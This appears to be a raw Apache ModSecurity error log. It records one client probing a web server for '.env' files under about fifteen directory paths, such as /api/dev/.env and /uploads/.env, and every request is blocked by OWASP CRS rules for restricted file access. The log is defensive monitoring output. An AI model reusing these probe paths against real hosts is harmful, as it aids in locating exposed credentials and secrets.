[Mon May 11 17:22:51.845834 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/gateway/.env"] [unique_id "agH0S0WKUxpmnkK7zHySdgAAAQs"]
[Mon May 11 17:22:51.846338 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/gateway/.env"] [unique_id "agH0S0WKUxpmnkK7zHySdgAAAQs"]
[Mon May 11 17:22:51.846586 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/gateway/.env"] [unique_id "agH0S0WKUxpmnkK7zHySdgAAAQs"]
[Mon May 11 17:22:52.008082 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/microservice/.env"] [unique_id "agH0TEWKUxpmnkK7zHySdwAAAQs"]
[Mon May 11 17:22:52.008621 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/microservice/.env"] [unique_id "agH0TEWKUxpmnkK7zHySdwAAAQs"]
[Mon May 11 17:22:52.008867 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/microservice/.env"] [unique_id "agH0TEWKUxpmnkK7zHySdwAAAQs"]
[Mon May 11 17:22:52.170090 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agH0TEWKUxpmnkK7zHySeAAAAQs"]
[Mon May 11 17:22:52.170587 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agH0TEWKUxpmnkK7zHySeAAAAQs"]
[Mon May 11 17:22:52.170826 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/service/.env"] [unique_id "agH0TEWKUxpmnkK7zHySeAAAAQs"]
[Mon May 11 17:22:52.334598 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/v3/.env"] [unique_id "agH0TEWKUxpmnkK7zHySeQAAAQs"]
[Mon May 11 17:22:52.335056 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/v3/.env"] [unique_id "agH0TEWKUxpmnkK7zHySeQAAAQs"]
[Mon May 11 17:22:52.335319 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/v3/.env"] [unique_id "agH0TEWKUxpmnkK7zHySeQAAAQs"]
[Mon May 11 17:22:52.497352 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/dev/.env"] [unique_id "agH0TEWKUxpmnkK7zHySewAAAQs"]
[Mon May 11 17:22:52.497885 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/dev/.env"] [unique_id "agH0TEWKUxpmnkK7zHySewAAAQs"]
[Mon May 11 17:22:52.498207 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/dev/.env"] [unique_id "agH0TEWKUxpmnkK7zHySewAAAQs"]
[Mon May 11 17:22:52.661558 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/staging/.env"] [unique_id "agH0TEWKUxpmnkK7zHySfAAAAQs"]
[Mon May 11 17:22:52.662123 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/staging/.env"] [unique_id "agH0TEWKUxpmnkK7zHySfAAAAQs"]
[Mon May 11 17:22:52.662366 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/staging/.env"] [unique_id "agH0TEWKUxpmnkK7zHySfAAAAQs"]
[Mon May 11 17:22:52.824073 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/vendor/.env"] [unique_id "agH0TEWKUxpmnkK7zHySgwAAAQs"]
[Mon May 11 17:22:52.824629 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/vendor/.env"] [unique_id "agH0TEWKUxpmnkK7zHySgwAAAQs"]
[Mon May 11 17:22:52.824922 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/vendor/.env"] [unique_id "agH0TEWKUxpmnkK7zHySgwAAAQs"]
[Mon May 11 17:22:52.986141 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/lib/.env"] [unique_id "agH0TEWKUxpmnkK7zHyShAAAAQs"]
[Mon May 11 17:22:52.986620 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/lib/.env"] [unique_id "agH0TEWKUxpmnkK7zHyShAAAAQs"]
[Mon May 11 17:22:52.986858 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/lib/.env"] [unique_id "agH0TEWKUxpmnkK7zHyShAAAAQs"]
[Mon May 11 17:22:53.471195 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /resources/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/resources/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNjgAAAAI"]
[Mon May 11 17:22:53.471972 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/resources/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNjgAAAAI"]
[Mon May 11 17:22:53.472414 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/resources/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNjgAAAAI"]
[Mon May 11 17:22:53.626529 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/assets/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNjwAAAAI"]
[Mon May 11 17:22:53.627007 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/assets/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNjwAAAAI"]
[Mon May 11 17:22:53.627248 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/assets/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNjwAAAAI"]
[Mon May 11 17:22:53.782298 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/uploads/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNkQAAAAI"]
[Mon May 11 17:22:53.782783 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/uploads/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNkQAAAAI"]
[Mon May 11 17:22:53.783041 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/uploads/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNkQAAAAI"]
[Mon May 11 17:22:53.937198 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /internal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/internal/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNkwAAAAI"]
[Mon May 11 17:22:53.937691 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/internal/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNkwAAAAI"]
[Mon May 11 17:22:53.937931 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/internal/.env"] [unique_id "agH0TQ-Qm4vhlWBPlMjNkwAAAAI"]
[Mon May 11 17:22:54.091899 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/tools/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNlAAAAAI"]
[Mon May 11 17:22:54.092408 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/tools/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNlAAAAAI"]
[Mon May 11 17:22:54.092678 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/tools/.env"] [unique_id "agH0Tg-Qm4vhlWBPlMjNlAAAAAI"]
